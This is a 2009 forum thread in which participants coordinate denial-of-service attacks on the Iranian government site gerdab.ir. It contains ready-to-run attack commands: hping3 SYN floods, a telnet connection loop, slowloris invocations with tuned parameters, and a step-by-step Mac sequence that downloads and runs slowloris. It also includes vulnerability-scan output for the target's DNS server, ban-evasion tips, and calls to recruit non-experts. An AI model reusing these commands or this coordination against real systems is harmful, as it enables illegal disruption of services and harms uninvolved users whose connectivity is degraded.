Customize

Moar Gerdab shite

Discussion in 'Help Iran Online' started by Srpska, Jul 12, 2009.

  1. Srpska Member

    OK, do we actually have any means of moving the fight against Gerdab on/up? It's been active for some time now, since it went into some kind of srs bznss lockdown mode.

    I know about the email spam, but if it's at all possible to deactivate the site itself we need to do so. I don't need to remind you of why.

    Nedasites and Slowloris are being blocked; someone mentioned that an HTTP flood might work. Any further info on this?
  2. I've been running hping3 for the past 12 hours or so in Ubuntu:

    hping3 gerdab.ir -p 80 -i u30000 -S

    This yields a steady 3.5 kib/s out and 1.9 kib/s in returning ACKs. After some fooling around with various options in pyloris and slow loris I settled on this as my best current bet, but I'm no expert. Seems like the slow loris attacks are initially potent but after a while gerdab stops acknowledging. Which would be great if it stopped responding because the server had been reduced to a smoldering heap but that's obviously not the case :)

    If anyone has better ideas or a more useful analysis, I'd be grateful to hear it.
  3. Ray Murphy Member

    I'm still waiting to hear if there is any value in reloading all the pictures, instead of just updating a minimal amount of data.
  4. Apache Server Status for gerdab.ir

    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8
    Server Built: May 28 2009 12:50:07

    Current Time: Monday, 13-Jul-2009 16:57:30 IRDT
    Restart Time: Sunday, 12-Jul-2009 04:02:36 IRDT
    Parent Server Generation: 1
    Server uptime: 1 day 12 hours 54 minutes 54 seconds
    Total accesses: 9332337 - Total Traffic: 288.4 GB
    CPU Usage: u679.32 s293.37 cu5591.92 cs0 - 4.94% CPU load
    70.2 requests/sec - 2.2 MB/second - 32.4 kB/request
    56 requests currently being processed, 78 idle workers
  5. I'm currently playing around with pygetraep, downloaded from:

    Partyvan Wiki

    Initial results are encouraging. This is a linux program, but I'm sure other bandwidth raeping tools are available in windows from the same source.

    I'll let you know if the IP banhammer comes down. I just get that feeling...
  6. They may have unlimited bandwidth

    That's all fine and dandy. Problem is that raeping is designed to exhaust bandwidth allocation allowance and thus force the site offline unless the owners pay extra to the hosting company. Gerdab has an unlimited allowance, I suspect, it's supported by the state. It's like trying to raep the White House website.
  7. That's extra time & money that isn't being spent to pay mercenaries to shoot innocent people in the face.
  8. Ray Murphy Member

    It would be interesting to see what happened if a whole bunch of people acted in unison at an agreed time.
  9. Me again, with the raeping... yeah, I'm not gonna lie -- this just boils down to me fiddling around and trying stuff and posting results because I'm running out of ways to throw my hate at these guys. :)

    I'll leave it to others to decide what's worth trying en masse. Tomorrow you might see me trying to shove a kitchen sink through the internets, who knows?
  10. Ray Murphy Member

    Is there any chance of repeatedly downloading the same images from sites? You know - by dumping them immediately after loading.
  11. get bwraep and point it at the pages with the pics. It works well but since I have to run it through tor (there is a built in button for this) it is slow. But i can get about 10-20 megs per hour
  12. Took a couple days of days but ye olde banhammer finally came down. Ah well, time to clone a new MAC address...
  13. But with the way Iran's national network backbone is structured, what it would really be doing is to raep *everyone's* bandwidth, slowing and possibly even preventing communication with the outside world via Twitter, Facebook, etc

    BWraep may be useful for sites being hosted outside Iran (like www.irna.ir) but those sites are also large enough so that they probably have unlimited bandwidth
  14. Ray Murphy Member

    Phones can be put out of action incessantly if enough callers are involved.
  15. unskilled

    - have been running slowloris but I get the feeling, that they are able to identify and block the sender. Also got the feeling, that they weren't able to do that, when, for a shorter periode, I used a mobil-connection. But this is absolutly unqualified.

    I see that you are discussing different methods. If there are some, that have just a little effect, I think you should post them in enough detail for non-hackers to run them - if possible. As others have mentioned, it's important to tie up their manpower and other resources.

    could maybe use tweeter to notify with: #gerdab
  16. Vee Member

    From watching the apache processes before they 403'd me I got the impression it was either only accepting limited number of connections from each IP. Or was resetting the connections faster to prevent sockets from being left open.
  17. Vee Member

    They might be blocking all IP's from outside of Iran. Would need to test from inside somehow.
  18. I am doing this

    while true; do telnet گرداب | Gerdab.ir 80 ; done

    it opens a connection, and after a while do it again ...

    Connected to گرداب | Gerdab.ir.
    Escape character is '^]'.
    HTTP/1.0 408 Request Time-out
    Cache-Control: no-cache
    Connection: close
    Content-Type: text/html

    <html><body><h1>408 Request Time-out</h1>
    Your browser didn't send a complete request in time.
    </body></html>
    Connection closed by foreign host.


    They don't block IPs from outside Iran, they are blocking all request with "user agent" Linux or Mac, they accept just windows
  19. Vee Member

    Its back up here in Australia
  20. There DNS servers are vulnerable to spoitz.
  21. Join me to doing this

    hping3 gerdab.ir -p 80 -i u30000 -S
  22. gerdab.ir site exploitable?

    Any further information on this? Is there a way we can help?
    Does anyone know which software they're using on the gerdab.ir-site? Any known bugs in it?
  23. Apache Server Status for gerdab.ir

    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8

    ns1.sinet.ir

    DNS Server Zone Tranfer Information Disclosure (AXFR)

    The remote name server allows DNS zone transfers to be performed.
    A zone transfer will allow the remote attacker to instantly populate
    a list of potential targets. In addition, companies often use a naming
    convention which can give hints as to a servers primary application
    (for instance, proxy.company.com, payroll.company.com, b2b.company.com, etc.).

    As such, this information is of great use to an attacker who may use it
    to gain information about the topology of your network and spot new
    targets.

    Solution: Restrict DNS zone transfers to only the servers that absolutely
    need it.

    Risk factor : Medium

    CVE : CVE-1999-0532
    Other references : OSVDB:492

    Nessus ID : 10595


    DNS Server Recursive Query Cache Poisoning Weakness

    Synopsis :

    The remote name server allows recursive queries to be performed
    by the host running nessusd.

    Description :

    It is possible to query the remote name server for third party
    names.

    If this is your internal nameserver, then ignore this warning.

    If you are probing a remote nameserver, then it allows anyone
    to use it to resolve third party names (such as Tenable Network Security).
    This allows attackers to perform cache poisoning attacks against
    this nameserver.

    If the host allows these recursive queries via UDP, then the
    host can be used to 'bounce' Denial of Service attacks against
    another network or system.

    See also :

    CERT Advisory CA-1997-22 BIND - the Berkeley Internet Name Daemon

    Solution :

    Restrict recursive queries to the hosts that should
    use this nameserver (such as those of the LAN connected to it).

    If you are using bind 8, you can do this by using the instruction
    'allow-recursion' in the 'options' section of your named.conf

    If you are using bind 9, you can define a grouping of internal addresses
    using the 'acl' command

    Then, within the options block, you can explicitly state:
    'allow-recursion { hosts_defined_in_acl }'

    If you are using another name server, consult its documentation.

    Risk factor :

    Medium / CVSS Base Score : 5.0
    (CVSS2#AV:N/AC:L/Au:N/C:N/I:p/A:N)

    CVE : CVE-1999-0024
    BID : 136, 678
    Other references : OSVDB:438

    Nessus ID : 10539


    DNS Server Cache Snooping Information Disclosure

    Synopsis :

    The remote DNS server is vulnerable to cache snooping attacks.

    Description :

    The remote DNS server responds to queries for third-party domains
    which do not have the recursion bit set.

    This may allow a remote attacker to determine which domains have
    recently been resolved via this name server, and therefore which hosts
    have been recently visited.

    For instance, if an attacker was interested in whether your company
    utilizes the online services of a particular financial institution,
    they would be able to use this attack to build a statistical model
    regarding company usage of that financial institution. Of course, the
    attack can also be used to find B2B partners, web-surfing patterns,
    external mail servers, and more...

    See also :

    For a much more detailed discussion of the potential risks of allowing
    DNS cache information to be queried anonymously, please see:

    http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf

    Risk factor :

    Medium / CVSS Base Score : 5.0
    (CVSS2#AV:N/AC:L/Au:N/C:p/I:N/A:N)

    Nessus ID : 12217
  24. bosnia vived

    It looks like a LAMP installation
    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8

    It seems that there are several WWWs behind a load balancing system.

    On the Persian page there are some, PHP forms, interesting for PHP hackers ...
  25. this has some progressing effects on the site

    perl ./slowloris.pl -dns گرداب | Gerdab.ir -timeout 5 -num 1000 -cache

    but need more help from your side

    down slowloris.pl and start it please
    Slowloris HTTP DoS
  26. I agree that it seems plausible that the page is a loadbalanced. Hence, they might just scale out with adding further servers to be able to handle the load we're causing.

    Did some basic xss-testing on the page, but without much success and do not have any proper vulnerability scanner available.

    If slowlaris is being filtered due to the reported webagent, there is a patch which will use a randomly selected webagent identifier in the requests(unable to find url atm). The keepalive for the site seems to be 5 secs.
  27. I don't think slow loris is being filtered out on the basis of reported web agent -- only my web browsers seem to be denied.

    Thanks you. This is the best response I've gotten out of slow loris in days. Packet flow is stop & start, but never dies away for long.
  28. Ruler licenses

    We need more people doing this

    perl ./slowloris.pl -dns gerdab.ir -timeout 5 -num 1000 -cache
  29. instructions

    i would like to, but need non-hacker-instructions for mac, if possible.
  30. Srpska Member

  31. Tynex Member

    They don't block IPs from outside Iran, they are blocking all request with "user agent" Linux or Mac, they accept just windows[/QUOTE]

    They block Linux or Mac since their knowledge is so little about them.
    And I can bet on that they have no valid licens for their windows version! since microsoft is not allowed to do business in Iran!

    as Microsoft says like this:
    " Are there certain countries you cannot ship Microsoft products to?

    Yes. In general, Microsoft products may not be exported to Cuba, Iran, North Korea, Sudan, or Syria. "

    sorce is from:
    Exporting Microsoft Products

    now I wounder can this be in any way good for us, and bad for them??
    I think all/many Iranian governments brunches are using Microsoft and cisco system products illegally!!
  32. Hi,
    the slowloris.pl is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long.
    To start you need first to install perl with these modules on your system, google on howto install perl on mac.

    Then download the perl program, and go to the command line and start this. Thanks!
  33. right?

    hi

    after having installed Xcode developer, as an experiment i typed these 4 lines in Terminal(macX):

    mkdir -p ~/Source && cd ~/Source/
    curl -O http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl -dns gerdab.ir -timeout 5 -num 1000 -cache

    (with return at end of each line)

    and it seems to be firering, and it is clear that perl is being recognized and interprented. But i'm uncertain about "the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long".
  34. Srpska Member

    If Microsoft products cannot be exported to Iran, and the Iranian Government bans Linux and Macs, what the hell are they all using? Acorns? One of those two statements must simply be wrong.

    I would guess that the setup is something like this:

    1. Microsoft sells stuff to Iranian Government
    2. Iranian Government sells stuff to citizens, and keeps some of it for its own use
    3. Iranian Government makes some kind of deal with Microsoft that it will be the sole avenue for Microsoft's stuff in Iran
    4. Thus, Microsoft is correct to say "in general we don't ship to Iran", because the only time it will do so is when the Government has put in an order.
    5. It is also possible that the Iranian Government got the bulk of its software (and indeed hardware) before the sanctions were put in place. This would mean they would be limited to Windows 95 at best.
  35. OR

    Iran get's it software illegally. My husband could get bootleg movies as quick as I could and he brought me a bootleg copy of Windows XP There are sanctions and there are ways around them.
  36. Tynex Member

    I did not mean that Iran as a hole country is blocking Linux and Mac! I supposed to quote another's message, about "gerdab" server is blocking all request with "user agent" Linux or Mac.

    So I meant this, if Microsoft understands that gerdab is using Microsoft product(s) ilegally, can they do something about gerdab?

    anyway Iran as a hole country is under American sanctions, this includes all american goods, also MacroSoft! and Iran is Not member of WTO!

    this means in practice every body can copy/hack anothers work/software!

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins